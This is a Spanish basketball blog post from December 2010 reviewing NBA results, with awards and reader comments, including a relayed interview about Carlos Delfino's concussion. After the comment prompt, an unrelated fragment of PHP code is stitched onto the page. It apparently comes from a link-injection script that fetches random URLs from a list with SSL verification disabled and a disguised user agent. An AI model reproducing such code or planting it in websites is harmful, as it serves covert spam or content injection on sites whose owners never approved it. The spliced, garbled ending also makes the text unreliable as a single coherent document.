La Crónica (13/12/2010)

14 de December de 2010 por TheDeerHunter

Se rompió la racha de los Mavs. En casa y contra los Bucks (103-99). No lo esperábamos muchos. Skiles le ganó la partida a Carlisle logrando abrir la defensa local desde el triple y controlando razonablemente bien a los escuderos ofensivos de Nowizki. Ni Butler, ni Terry, ni Barea estuvieron cómodos en esta ocasión. Los Bucks se mostraron superiores en uno de los aspectos que les está haciendo grandes a Dallas, la profundidad de banco. La ayuda que necesitaron Bogut y Jennings la recibieron sobradamente de manos de Dooling, Ilyasova y Douglas-Roberts. También recuperaron a Gooden, que siempre ayuda. De esta forma lograron superar en 10 puntos los promedios anotadores que suelen permitir los Mavericks.

Los que se encuentran ahora mismo en la cresta de la ola son los Heat, que sumaron la 9ª victoria consecutiva a costa de unos Hornets en crisis manifiesta (84-96). Ayer Wade lideró a los suyos en un partido que no tuvo demasiada historia. La incapacidad anotadora del equipo de Nueva Orleans volvió a ponerse de manifiesto en el último cuarto, en el que únicamente fueron capaces de anotar 9 puntos. ¿Qué fue de Marcus Thornton?

Bulls y Utah lideran sus respectivas divisiones y ganaron demasiado sobrados a Pacers (73-92) y Warriors (95-108), respectivamente. Por un lado Carlos Boozer y por el otro Al Jefferson destacaron en ambas victorias.

En Memphis, los Blazers volvieron a protagonizar un partido penoso (73-86). Sólo Matthews y André Miller pudieron perforar la discutible defensa de los Grizzlies. Por los locales brilló Zach Randolph… y por fin pudimos disfrutar de un partido correcto de O.J. Mayo.

PREMIOS

MVP: Partidazos de Deron Williams (30 puntos, 6 rebotes y 10 asistencias) y Zach Randolph (25 puntos y 20 rebotes). Ambos fueron los líderes en las respectivas victorias de sus equipos.

Rookie: Ningún novato tuvo una actuación mínimamente destacada en el día de ayer.

Sorpresa: La ausencia de Stephen Curry está beneficiando sobremanera a Reggie Williams. Anoche cuajó otra completa actuación con 19 puntos, 5 rebotes y 6 asistencias.

Decepción: Desesperantes Blazers con Brandon Roy (3 de 16) y Rudy Fernandez (1 de 7) a la cabeza.

Esfuerzo en vano: El alemán Dirk Nowitzki es el principal culpable de que los Mavs sean uno de los equipos de moda del campeonato. Ayer, mantuvo su nivel (30 puntos, 7 rebotes) pero la racha de victorias consecutivas se acabó a la duodécima.

Comenta

11 comentarios a esta entrada

  1. Busky23 dice:
    #1

    Se acabó la racha triunfal de Dallas,en casa y contra quien menos se pensaban.Nowitzki  ha tenido opción de empatar pero esta vez no entró. Buen partido de Jennings,Bogut y el banquillo.
    En Portland,no entiendo la cabezoneria de hacer jugar a un Roy muy mermado y limitado,echandose piedras sobre su propio tejado. 7 de 32 en tiro en los 2 últimos partidos…si él quiere jugar a toda costa,que alguien le frene.
    En Utah,nueva exhibición de Deron,celebrando por todo lo alto su elección como mvp del oeste del mes de Noviembre y siguiendo con buenas noticias parece que la vuelta de Okur es inminente.
    Suman y siguen los Beach Boys a costa de los NBA Hornets,que empiezan a verse en posiciones más lógicas con la plantilla que tienen,fué bonito mientras duró.

    Saludos.

      Citar

  2. Hynreck dice:
    #2

    La verdad es que los Blazers se han caído completamente en 3 años. Han pasado de ser entonces el equipo con un futuro espléndido, con jugadores que se preveían dominantes como Oden, Lamarcus y Roy, con complementos jovenes como Bayless y Rudy, y completando jugadores muy válidos tipo Outlaw, Andre Miller, Przybilla… y han pasado a ser un equipo deprimente, asolado por las lesiones, sin visos de esperanza… Un poryecto lamentablemente acabado, cuando este mismo año tenían que estar pelenado por el anillo si todo hubiese seguido un curso correcto…
    Una pena…

      Citar

  3. Txusma dice:
    #3

    Las lesiones han sido y están siendo un factor importante en el declive Blazer, pero la gestión de McMillan tampoco parece haber sido la mejor de todas.

      Citar

  4. LEmontus dice:
    #4

    el equipo mas castigado por las lesiones es GSW que solo han jugado 5 o 6 partidos con sus tres estrellas…(que fueron los momentos en los que estuvieron bien posicionados en su conferencia). LEs di un puesto bastante alto pero no contaba con que siguieran gafado….

      Citar

  5. LEmontus dice:
    #5

    Tocando el tema importante sublimes Bogut y Jennings aunque sobre todo Brandon que empezó la remontada de Bucks con mucho corage y acabó la machada con buenos minutos finales.
    Milwaukee podrá ganar a cualquiera cuando Salmons deje de tirar (cosa que no sabe) y se ponga a entrar(cosa que hace a la perfección). Y como tiene pinta de que Salmons no cambiará lo oto que puede salvarnos es que vuelva ya Delfino que nos dará un salto de calidad importante.

    Por parte de Mavs Dirk espectacular lo veo sobre todo en el tiro mejor que nunca.

    P:D: Yo si me esperaba la victoria de bucks… aunque no creo que saque un record positivo en las tres semanas que tiene por delante que es un calendario dificilísimo.

      Citar

  6. telekoman dice:
    #6

    Y a todo esto, ¿Delfino cuando leches vuelve?

      Citar

  7. Busky23 dice:
    #7

    En el periódico de Milwaukee, Delfino admite haberse sentido asustado en las últimas semanas ante lo que le ocurría después de haber recibido lo que parecía simplemente un golpe más de los que recibe un jugador a lo largo de su carrera.

    “Es frustrante porque es algo que no puedes controlar”, dice Delfino, “No es como una lesión de rodilla de la que te recuperas levantando pesas. Aquí se trata de tu cerebro y en cada cosa que haces lo estás utilizando”.

    Y es que Delfino ha estado muchos días sin poder hacer prácticamente nada. “No era capaz de ver la tele o leer en internet o leer un libro, ni siquiera de charlar porque si hablaba me dolía la cabeza. Tenía vértigos y mareos”, confiesa el santafesino.

    Afortunadamente, su estado ha mejorado notablemente en las últimas semanas y los síntomas han remitido, aunque no del todo (al 90% según los médicos). “Incluso ahora, si estoy conduciendo, no puedo hablar al mismo tiempo”, asegura, “Si alguien me habla o me llama por teléfono, no puedo mantener la conversación mucho tiempo. Ahora mismo, puedo centrarme únicamente en una sola cosa”.

    El resultado de una serie de golpes accidentales

    Los problemas de Delfino se iniciaron en el segundo partido de la temporada, ante Minnesota, cuando al recibir una carga se golpeó la cabeza contra la rodilla de otro jugador. No pareció nada importante, como no lo pareció inicialmente el codazo en la oreja que recibió al día siguiente ante los Charlotte Bobcats.

    “Fue una de tantas acciones de un partido”, rememora Delfino, “Después del codazo en mi oreja, empecé a sentirme algo tambaleante y más cansado. Pero no me pareció nada realmente grave”.

    Desgraciadamente, la cosa no se quedó ahí y el fin de semana siguiente recibió un nuevo golpe fortuito en el pómulo, esta vez del jugador de los Pacers Danny Granger. Fue el golpe de gracia. Delfino terminó ese partido, pero la noche siguiente, ante los Hornets, empezó a sentirse mareado y tuvo que retirarse en la primera mitad.

    Poco después, los médicos le diagnosticaron la conmoción cerebral que le ha tenido parado hasta ahora, además de un problema en el vestíbulo del oído en el que recibió el codazo que ha contribuido a amplificar sus vértigos.

    Una lesión esta última que le obligará a salir a pista con un protector en el oído cuando vuelva a jugar, un protector que ya ha probado. “No quiero entrenar con él, pero me será útil. Sé que lo voy a llevar y me ayudará. Pero no sé la fecha en la que volveré”, ha dicho el alero, que estos días ha empezado a entrenar de forma suave sobre la bicicleta estática.

    Agradece el apoyo de todos

    Delfino asegura que su mujer, Martina, ha sido un gran apoyo durante todos este penoso proceso, como lo han sido sus padres, Carlos y Cristina, que se desplazaron desde Argentina hasta Milwaukee para estar con su hijo durante una semana.

    El alero de los Bucks ha agradecido a todos ellos su apoyo, así como a todos los miembros de la franquicia y a sus compañeros, que han soportado sus repentinos cambios de humor, otra secuela de la lesión. “Con los síntomas de la conmoción, te cambian las emociones. A veces te pones agresivo o emotivo. Sé que a mi me ha pasado”, reconoce Delfino.

    “Ya he tenido 2 conmociones y es algo que puede ser grave si no tienes cuidado”, asegura el argentino, que ya nos dio un susto tremendo a final de la temporada pasada y al que la lesión ha cortado un excelente inicio de temporada con casi 13 puntos de media anotados por encuentro.

    Ahora, no puede ni lanzar a canasta, pero ha decidido ser paciente. “Con un poco de suerte, continuaré mejorando poco a poco. El día que pueda lanzar de nuevo, sé que habré dado un gran paso”, afirma. Esperamos poder verle muy pronto sobre la cancha.

      Citar

  8. LEmontus dice:
    #8

    GRan noticia y gracias por la info pues no sabía que estaba tan jodido… lo que si se que cuando emepezó la temporada estaba al mejor nivel de su carrera.

      Citar

  9. Max dice:
    #9

    Pues otro que anda jodido es Brandon Roy. Según publicó Yahoo Sports hace unas semanas, dos fuentes con conocimiento del estado físico del jugador aseguran que los días de Roy como estrella de la NBA se han acabado, porque su rodilla está seriamente dañada: “No hay ninguna esperanza de que mejore. No va a ser el jugador franquicia que se pensaba que podria ser” asegura una de esas fuentes.
    O sea, que aunque esté jugando muchos minutos su nivel ya no es el que era hace dos temporadas y por lo que dicen ya no lo volverá a ser. Si se confirma, parece que la maldición de Portland no tiene fin……

      Citar

  10. alfin dice:
    #10

    skiles es uno de los mejores tecnicos qe trabaja la defensa con un ekipo “de bajo nivel” como son los bucks, aun asi me he despertado pensando que los mavs iban a seguir asi teniendo en cuenta con el rival qe juban y entonces: SORPRESON!

      Citar

  11. LEmontus dice:
    #11

    bajo nivel el año pasado y tampoco pero este año tienen un buen equipo.(el año pasado tenian buena plantilla para los que conozcan de verdad a esos jugadores a los Ilyasova Delfino Jennings Ridnour Mbah…).

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>